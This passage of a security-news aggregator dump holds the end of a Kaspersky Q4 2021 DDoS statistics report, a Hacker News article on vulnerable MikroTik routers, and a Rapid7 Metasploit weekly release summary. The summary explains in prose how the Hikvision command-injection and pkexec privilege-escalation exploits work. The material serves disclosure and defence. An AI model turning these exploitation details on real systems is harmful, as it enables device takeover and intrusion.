The most targets were located in the US (44.54%), whose share increased compared to the previous quarter. The second and third lines are taken by the Hong Kong SAR (9.07%) and China (8.12%), respectively.\n\n_Distribution of unique targets by country and territory, Q3 and Q4 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/09154823/04-en-ddos-report-q4.png>))_\n\nIn fourth place by number of targets is Germany (4.67%), followed in fifth by the UK (3.58%). Next come France (3.28%) and Canada (2.98%). The share of these four countries increased slightly in Q4, and they moved up one rank from Q3. Eighth by number of unique targets was the Netherlands (2.76%), whose share almost doubled, and rounding out the TOP 10, as in the ranking by number of attacks, were Singapore (2.49%) and Brazil (2.37%), whose share almost halved.\n\n### Dynamics of the number of DDoS attacks\n\nDuring Q4, our DDoS Intelligence system recorded 86,710 DDoS attacks on resources worldwide. In contrast to the previous reporting period, which saw several unusually stormy days, the attacks were distributed relatively evenly throughout the quarter: from 500 to 1,500 per day. However, we did see a surge in DDoS activity on October 11, with 2,606 attacks in 24 hours. November, meanwhile, was marked by two notable drops in DDoS activity: on November 9\u201311 and 23\u201330, the number of attacks fell below 500 per day. Curiously, the first drop came on Chinese Singles' Day and the second on Black Friday. Both dates are associated with massive online sales, which tend to cause a spike in various kinds of web attacks.\n\n_Dynamics of the number of DDoS attacks, Q4 2021 ([download](<https://khub-media.s3.eu-west-1.amazonaws.com/wp-content/uploads/sites/58/2022/02/09160339/05-en-ru-es-ddos-report-q4.png>))_\n\nAs we noted above, Q4 lacked the dramatic bursts of DDoS activity seen in its predecessor. 
This was reflected also in the distribution of attacks by day of the week: the spread between the most and least active days was 5.02%, down 2.72 p.p. on Q3. We observed the most DDoS attacks on Sundays (16.61%) \u2014 this day's share in the distribution of attacks climbed by 0.66 p.p.; Thursday (11.59%) remained the quietest day, despite its share increasing slightly. The shares of Monday (15.78%), Tuesday (14.17%) and Friday (14.58%) also increased, while those of Wednesday (12.67%) and Saturday (14.60%) decreased, with Wednesday in Q4 being the second calmest day after Thursday.\n\n_Distribution of DDoS attacks by day of the week, Q3 and Q4 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/09154916/06-en-ddos-report-q4.png>))_\n\n### Duration and types of DDoS attacks\n\nIn Q4, we observed an increase in the share of very short (less than 4 hours) DDoS attacks, which accounted for 94.29% of the total, plus a significant drop in the number of long ones: only 0.02% of attacks lasted more than 100 hours. What's more, the longest attack in the quarter was one-third shorter than the longest in the previous reporting period \u2014 218 hours, or just over nine days. Consequently, the average DDoS attack duration fell once more, this time to just under two hours.\n\n_Distribution of DDoS attacks by duration, Q3 and Q4 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/09154944/07-en-ddos-report-q4.png>))_\n\nIn terms of attack types, in Q4 we again saw a redistribution of forces. UDP flooding came out on top again, with more than half of all attacks deploying this method. The share of TCP flooding (30.75%) also increased markedly, while that of SYN flooding (16.29%) decreased more than three times. 
HTTP (1.33%) and GRE flooding (1.32%) stayed put, although their shares increased slightly.\n\n_Distribution of DDoS attacks by type, Q4 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/09155033/08-en-ddos-report-q4.png>))_\n\n### Geographic distribution of botnets\n\nThe most botnet C2 servers active in Q4 were located in the US (46.49%), whose share increased by 3.05 p.p. against the previous reporting period. The Netherlands (10.17%) and Germany (7.02%) swapped places. A further 6.78% of C2 servers were located in the Czech Republic, whose share grew almost by 3 p.p., while Canada and the UK each had a 3.15% slice. France hosted 2.91% of the active botnet infrastructure, while 2.66% of C2 servers operated out of Russia. Also in the TOP 10 countries by location of botnets were Vietnam (1.94%) and Romania (1.45%).\n\n_Distribution of botnet C2 servers by country, Q4 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/09155106/09-en-ddos-report-q4.png>))_\n\n### Attacks on IoT honeypots\n\nAs for bots attempting to expand botnets in Q4, the largest share of devices that attacked Kaspersky SSH honeypots were located in China (26.73%), the US (11.20%) and Germany (9.05%). At the same time, the share of the first two countries decreased, while the latter added 3.47 p.p. against Q3. Another 5.34% of active bots were located in Vietnam, and 5.13% in Brazil. That said, the vast majority of attacks on our honeypots (70.96%) originated in Russia, where only 2.75% of attacking devices were located; while Vietnam accounted for just 7.94% of attacks, and the US 4.84%. 
This most likely means that at least one Russian bot showed a high level of performance.\n\n_Geographic distribution of devices from which attempts were made to attack Kaspersky SSH honeypots, Q4 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/09155150/10-en-ddos-report-q4.png>))_\n\nMost of the devices that attacked our Telnet traps, as in the previous quarter, were situated in China (44.88%), India (12.82%) and Russia (5.05%). The first country's share increased by 3.76 p.p., while the latter two saw a drop of 2.4 and 0.93 p.p., respectively. The lion's share of attacks on Kaspersky honeypots came from China (65.27%).\n\n_Geographic distribution of devices from which attempts were made to attack Kaspersky Telnet honeypots, Q4 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/02/09155228/11-en-ddos-report-q4.png>))_\n\n## Conclusion\n\nOn the one hand, Q4 met our expectations for this period; on the other, it surprised us. For example, instead of the expected increase in DDoS activity during major online sales, we saw a botnet lull. A feature of the quarter was the large number of very short DDoS attacks, as well as a slew of media reports about short but powerful attacks.\n\nNow for our forecasts. Going by previous years' trends, we expect Q1 2022 to produce roughly the same indicators as Q4 2021. But the situation in the world and, in particular, the cryptocurrency market is too volatile to make such a confident prediction. The bitcoin price has fallen to half its peak value, but remains high. It suffered a similar collapse in the middle of last year, but after that grew even stronger. If cryptocurrencies shoot up again, we could see a significant drop in the DDoS attack market, but if they sink even further, we will probably see an increase. It is impossible to predict which way it will go. 
But despite the lack of concrete information, we see no preconditions for any major fluctuations, and expect figures similar to those in Q4.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2022-02-10T10:00:04", "type": "securelist", "title": "DDoS attacks in Q4 2021", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-6079", "CVE-2021-22205", "CVE-2021-36260", "CVE-2021-44228"], "modified": "2022-02-10T10:00:04", "id": "SECURELIST:52D1B0F6F56EE960CC02B969556539D6", "href": "https://securelist.com/ddos-attacks-in-q4-2021/105784/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "thn": [{"lastseen": "2022-05-09T12:37:49", "description": "[](<https://thehackernews.com/new-images/img/a/AVvXsEix1GGoHWyTZLIUNdkduXaLWZZLCDe-TrjKwb4KKIrRL4PHcksUfqokWOurA4_ELZuNKNgm7Lzql76g_MpF-S_rgaKWevi5N6GiIt-9KqwMvkGlA2FQ-8z0y745lviXIaO0r3idvFlLM9TuheAqeofoGLiUva3NgbZcTa9dIglhiqGnTrSFOQSgRIlQ>)\n\nAt least 300,000 IP addresses associated with MikroTik devices have been found vulnerable to multiple remotely exploitable security vulnerabilities that have since been patched by the popular supplier 
of routers and wireless ISP devices.\n\nThe most affected devices are located in China, Brazil, Russia, Italy, Indonesia, with the U.S. coming in at number eight, cybersecurity firm Eclypsium said in a report shared with The Hacker News.\n\n\"These devices are both powerful, [and] often highly vulnerable,\" the researchers [noted](<https://eclypsium.com/2021/12/09/when-honey-bees-become-murder-hornets/>). \"This has made MikroTik devices a favorite among threat actors who have commandeered the devices for everything from DDoS attacks, command-and-control (aka 'C2'), traffic tunneling, and more.\"\n\nMikroTik devices are an enticing target not least because there are more than two million of them deployed worldwide, posing a huge attack surface that can be leveraged by threat actors to mount an array of intrusions.\n\nIndeed, earlier this September, reports emerged of a new botnet named [M\u0113ris](<https://thehackernews.com/2021/09/meris-botnet-hit-russias-yandex-with.html>) that staged a record-breaking distributed denial-of-service (DDoS) attack against Russian internet company Yandex by using network devices from Mikrotik as an attack vector by exploiting a now-addressed security vulnerability in the operating system ([CVE-2018-14847](<https://blog.mikrotik.com/security/winbox-vulnerability.html>)).\n\nThis is not the first time MikroTik routers have been [weaponized](<https://thehackernews.com/2018/10/router-hacking-exploit.html>) in real world attacks. In 2018, cybersecurity firm Trustwave [discovered](<https://thehackernews.com/2018/08/mikrotik-router-hacking.html>) at least three massive malware campaigns exploiting hundreds of thousands of unpatched MikroTik routers to secretly install cryptocurrency miners on computers connected to them. 
The same year, China's Netlab 360 [reported](<https://thehackernews.com/2018/09/mikrotik-router-hacking.html>) that thousands of vulnerable MikroTik routers had been surreptitiously corralled into a botnet by leveraging CVE-2018-14847 to eavesdrop on network traffic.\n\n[](<https://thehackernews.com/new-images/img/a/AVvXsEjf-4TWedeGUlB_bMho_dY9tqYdz2Kvj7mLWtDTd0RfxyFAPtJXH2iyPwIJiltFNdCSHJBCWFoXv1M8Qr4AmqvvTF1dqJ33YucavckSpyBXtrf9w8Pna61zVy5EClw8XTx0MaP6ip-wBZn1j981BgwLTMh-GaRILYXmEwAs1Mkn1CbIkUXo7jicATJX>)\n\nCVE-2018-14847 is also among the four vulnerabilities discovered over the last three years that MikroTik has since patched in RouterOS but that remain unaddressed on many deployed devices, each of which could enable full takeover of the device -\n\n * [**CVE-2019-3977**](<https://nvd.nist.gov/vuln/detail/CVE-2019-3977>) (CVSS score: 7.5) - MikroTik RouterOS insufficient validation of upgrade package's origin, allowing a reset of all usernames and passwords\n * [**CVE-2019-3978**](<https://nvd.nist.gov/vuln/detail/CVE-2019-3978>) (CVSS score: 7.5) - MikroTik RouterOS insufficient protections of a critical resource, leading to cache poisoning\n * [**CVE-2018-14847**](<https://nvd.nist.gov/vuln/detail/CVE-2018-14847>) (CVSS score: 9.1) - MikroTik RouterOS directory traversal vulnerability in the WinBox interface\n * [**CVE-2018-7445**](<https://nvd.nist.gov/vuln/detail/CVE-2018-7445>) (CVSS score: 9.8) - MikroTik RouterOS SMB buffer overflow vulnerability\n\nIn addition, Eclypsium researchers said they found 20,000 exposed MikroTik devices that injected cryptocurrency mining scripts into web pages that users visited.\n\n\"The ability for compromised routers to inject malicious content, tunnel, copy, or reroute traffic can be used in a variety of highly damaging ways,\" the researchers said. 
\"DNS poisoning could redirect a remote worker's connection to a malicious website or introduce a machine-the-middle.\"\n\n[](<https://thehackernews.com/new-images/img/a/AVvXsEhMqn1SEjfxCQg0TlmBiRLjns0oxiNeJVLGXoWWhWiK8dgSFy0p3HPV-OqMPAYNzppLMBBv9DcbckRiwOOq1Y1WX0dsivBlkPWPsOjRkalNB-gaEQGLm3g11ijAzOl1tJr6T5DfWiAzLCP4gtQd-zgTHz8jCpvtouAWe7ipGxduIgP3puqfo_C43uoR>)\n\n\"An attacker could use well-known techniques and tools to potentially capture sensitive information such as stealing [MFA](<https://en.wikipedia.org/wiki/Multi-factor_authentication>) credentials from a remote user using SMS over WiFi. As with previous attacks, enterprise traffic could be tunneled to another location or malicious content injected into valid traffic,\" the researchers added.\n\nMikroTik routers are far from the only devices to have been co-opted into a botnet. Researchers from Fortinet this week disclosed how the [Moobot botnet](<https://www.fortinet.com/blog/threat-research/mirai-based-botnet-moobot-targets-hikvision-vulnerability>) is leveraging a known remote code execution (RCE) vulnerability in Hikvision video surveillance products ([CVE-2021-36260](<https://nvd.nist.gov/vuln/detail/CVE-2021-36260>)) to grow its network, and use the compromised devices to launch distributed denial-of-service (DDoS) attacks.\n\nIn a separate [report](<https://www.fortinet.com/blog/threat-research/manga-aka-dark-mirai-based-campaign-targets-new-tp-link-router-rce-vulnerability>), the enterprise cybersecurity firm said that the operators of a botnet known as Manga aka Dark Mirai are actively abusing a recently disclosed post-authenticated remote code execution vulnerability ([CVE-2021-41653](<https://nvd.nist.gov/vuln/detail/CVE-2021-41653>)) to hijack TP-Link routers and co-opt the appliances to their network of infected devices.\n\n## Update\n\nIn a statement shared with The Hacker News, the Latvian company said that \"there are no new vulnerabilities in RouterOS,\" while stressing that keeping the 
operating system up to date is an \"essential step to avoid all kinds of vulnerabilities.\"\n\n\"Unfortunately, closing the old vulnerability does not immediately protect the affected routers. We don't have an illegal backdoor to change the user's password and check their firewall or configuration. These steps must be done by the users themselves,\" the company explained.\n\n\"We try our best to reach out to all users of RouterOS and remind them to do software upgrades, use secure passwords, check their firewall to restrict remote access to unfamiliar parties, and look for unusual scripts. Unfortunately, many users have never been in contact with MikroTik and are not actively monitoring their devices. We cooperate with various institutions worldwide to look for other solutions as well.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-12-09T11:15:00", "type": "thn", "title": "Over 300,000 MikroTik Devices Found Vulnerable to Remote Hacking Bugs", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": 
"AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-14847", "CVE-2018-7445", "CVE-2019-3977", "CVE-2019-3978", "CVE-2021-36260", "CVE-2021-41653"], "modified": "2021-12-10T11:53:59", "id": "THN:C96E59A0B083B41A78F431F292E7E1D5", "href": "https://thehackernews.com/2021/12/over-300000-mikrotik-devices-found.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "rapid7blog": [{"lastseen": "2022-03-04T23:28:17", "description": "\n\nThis week\u2019s Metasploit Framework release brings us seven new modules.\n\n## IP Camera Exploitation\n\nRapid7\u2019s [Jacob Baines](<https://github.com/jbaines-r7>) was busy this week with two exploit modules that target IP cameras. The [first](<https://github.com/rapid7/metasploit-framework/pull/16190>) module exploits an authenticated file upload on Axis IP cameras. Due to lack of proper sanitization, an attacker can upload and install an `eap` application which, when executed, will grant the attacker `root` privileges on the device. This vulnerability, discovered by Baines in 2017, has yet to be patched.\n\nThe [second](<https://github.com/rapid7/metasploit-framework/pull/16204>) module exploits an unauthenticated command injection [vulnerability](<https://attackerkb.com/topics/mb8q72U2LT/cve-2021-36260?referrer=blog>) in a number of Hikvision IP cameras. A `PUT` request to the `/SDK/webLanguage` endpoint passes the contents of its request body\u2019s `<language>` tag to `snprintf()`, which then passes its resultant data to a call to `system()`, resulting in code execution with `root` privileges. 
This vulnerability has been [reported](<https://www.fortinet.com/blog/threat-research/mirai-based-botnet-moobot-targets-hikvision-vulnerability>) as exploited in the wild.\n\n## Privilege Escalation in pkexec\n\nCommunity contributor [RootUp](<https://github.com/RootUp>) submitted a [module](<https://github.com/rapid7/metasploit-framework/pull/16103>) that exploits a privilege escalation [vulnerability](<https://attackerkb.com/topics/JGooJTBk81/cve-2021-4034?referrer=blog>) in Polkit\u2019s `pkexec` utility, an SUID binary that is present on most major Linux distributions. Additionally, this vulnerability has likely existed in `pkexec` since [2009](<https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt>).\n\nAny user can escalate their privileges to `root` by exploiting an out-of-bounds read and write that exists in `pkexec`\u2019s executable path-finding logic. The logic assumes that at least one argument is passed to `pkexec`; when the binary is executed with an empty argument list (argc == 0), the index it uses to locate the program to run lands on `argv[1]`, which lies past the `NULL` that terminates `argv` and is therefore the first environment variable, because the kernel places the environment block directly after the argument block in memory. `pkexec` reads that environment variable as if it were a program name, resolves its full path, and writes the resolved path back to the same location, overwriting the environment variable. 
Leveraging the `GCONV_PATH` environment variable coerces `pkexec` into loading arbitrary libraries, leading to escalation of privileges.\n\n## New module content (7)\n\n * [WordPress Modern Events Calendar SQLi Scanner](<https://github.com/rapid7/metasploit-framework/pull/16131>) by Hacker5preme (Ron Jost), h00die, and red0xff, which exploits [CVE-2021-24946](<https://attackerkb.com/topics/afV2x8poTz/cve-2021-24946?referrer=blog>) \\- This exploits an unauthenticated SQL injection vulnerability in the Modern Events Calendar plugin for Wordpress.\n\n * [Wordpress Secure Copy Content Protection and Content Locking sccp_id Unauthenticated SQLi](<https://github.com/rapid7/metasploit-framework/pull/16182>) by Hacker5preme (Ron Jost), Krzysztof Zaj\u0105c (kazet), and h00die, which exploits [CVE-2021-24931](<https://attackerkb.com/topics/j2W7NOa1jw/cve-2021-24931?referrer=blog>) \\- A new module has been added to exploit CVE-2021-24931, an unauthenticated SQLi vulnerability in the `sccp_id` parameter of the `ays_sccp_results_export_file` AJAX action in Secure Copy Content Protection and Content Locking WordPress plugin versions before 2.8.2. Successful exploitation allows attackers to dump usernames and password hashes from the `wp_users` table which can then be cracked offline to gain valid login credentials for the affected WordPress installation.\n\n * [Axis IP Camera Application Upload](<https://github.com/rapid7/metasploit-framework/pull/16190>) by jbaines-r7 - The \"Apps\" feature in Axis IP cameras allows third party developers to upload and execute 'eap' applications on the device; however, no validation is performed to ensure the application comes from a trusted source. This module takes advantage of this vulnerability to allow authenticated attackers to upload and execute malicious applications and gain RCE. Once the application has been installed and the shell has been obtained, the module will then automatically delete the malicious application. 
No CVE is assigned to this issue as a patch has not been released as of the time of writing.\n\n * [Hikvision IP Camera Unauthenticated Command Injection](<https://github.com/rapid7/metasploit-framework/pull/16204>) by Watchful_IP, bashis, and jbaines-r7, which exploits [CVE-2021-36260](<https://attackerkb.com/topics/mb8q72U2LT/cve-2021-36260?referrer=blog>) \\- This module exploits an unauthenticated command injection in a variety of Hikvision IP cameras (CVE-2021-36260). The module inserts a command into an XML payload used with an HTTP PUT request sent to the /SDK/webLanguage endpoint, resulting in command execution as the root user.\n\n * [Local Privilege Escalation in polkits pkexec](<https://github.com/rapid7/metasploit-framework/pull/16103>) by Andris Raugulis, Dhiraj Mishra, Qualys Security, and bwatters-r7, which exploits [CVE-2021-4034](<https://attackerkb.com/topics/JGooJTBk81/cve-2021-4034?referrer=blog>) \\- This adds an LPE exploit for CVE-2021-4034 which leverages an out-of-bounds read and write in polkit's pkexec utility. It also adds support to Metasploit for generating Linux SO library payloads for the AARCH64 architecture.\n\n * [Firefox MCallGetProperty Write Side Effects Use After Free Exploit](<https://github.com/rapid7/metasploit-framework/pull/16185>) by 360 ESG Vulnerability Research Institute, maxpl0it, and timwr, which exploits [CVE-2020-26950](<https://attackerkb.com/topics/NuuSBUKQIb/cve-2020-26950?referrer=blog>) \\- This adds a module for CVE-2020-26950, a use after free browser exploit targeting Firefox and Thunderbird.\n\n * [#16202](<https://github.com/rapid7/metasploit-framework/pull/16202>) from [zeroSteiner](<https://github.com/zeroSteiner>) \\- This adds an exploit for [CVE-2022-21882](<https://github.com/advisories/GHSA-m3vx-53cf-jqv4>) which is a patch bypass for [CVE-2021-1732](<https://attackerkb.com/topics/7eGGM4Xknz/cve-2021-1732?referrer=blog>). 
It updates and combines both techniques into a single mega-exploit module that will use the updated technique as necessary. No configuration is necessary outside of the SESSION and payload datastore options.\n\n## Bugs fixed\n\n * [#16228](<https://github.com/rapid7/metasploit-framework/pull/16228>) from [zeroSteiner](<https://github.com/zeroSteiner>) \\- This fixes a bug where the framework failed to check if a payload would fit in the space defined by an exploit if the payload was not encoded.\n * [#16235](<https://github.com/rapid7/metasploit-framework/pull/16235>) from [bcoles](<https://github.com/bcoles>) \\- This change fixes an issue with APK injection when in some configurations an invalid apktool version string would cause injection to fail.\n * [#16251](<https://github.com/rapid7/metasploit-framework/pull/16251>) from [zeroSteiner](<https://github.com/zeroSteiner>) \\- This fixes an error when executing commands using the Python Meterpreter where not all results were returned to msfconsole.\n * [#16254](<https://github.com/rapid7/metasploit-framework/pull/16254>) from [heyder](<https://github.com/heyder>) \\- This fixes an issue in the Shodan search module where recent changes to randomize the user agent were causing the results returned to the module to be in an unexpected format.\n * [#16255](<https://github.com/rapid7/metasploit-framework/pull/16255>) from [zeroSteiner](<https://github.com/zeroSteiner>) \\- This fixes a parsing issue with kiwi_cmd arguments which contained spaces, such as `kiwi_cmd 'base64 /in:off /out:off'`.\n * [#16257](<https://github.com/rapid7/metasploit-framework/pull/16257>) from [bcoles](<https://github.com/bcoles>) \\- This change adds a warning when a user tries to inject the Android payload into an APK using an older version of apktool.\n * [#16264](<https://github.com/rapid7/metasploit-framework/pull/16264>) from [bwatters-r7](<https://github.com/bwatters-r7>) \\- This fixes a crash when attempting to create local 
module documentation with the `info -d` command when the provided GitHub credentials were invalid.\n * [#16266](<https://github.com/rapid7/metasploit-framework/pull/16266>) from [smashery](<https://github.com/smashery>) \\- This fixes bugs in how `msfconsole` tab-completes directory paths.\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` \nand you can get more details on the changes since the last blog post from \nGitHub:\n\n * [Pull Requests 6.1.31...6.1.32](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222022-02-24T11%3A00%3A46-06%3A00..2022-03-03T12%3A00%3A18-05%3A00%22>)\n * [Full diff 6.1.31...6.1.32](<https://github.com/rapid7/metasploit-framework/compare/6.1.31...6.1.32>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. \nTo install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the \n[binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-04T21:52:42", "type": "rapid7blog", "title": "Metasploit Weekly Wrap-Up", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", 
"availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-26950", "CVE-2021-1732", "CVE-2021-24931", "CVE-2021-24946", "CVE-2021-36260", "CVE-2021-4034", "CVE-2022-21882"], "modified": "2022-03-04T21:52:42", "id": "RAPID7BLOG:4BFD931715758C7B7E2711A580BFEA5E", "href": "https://blog.rapid7.com/2022/03/04/metasploit-wrap-up-150/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}]}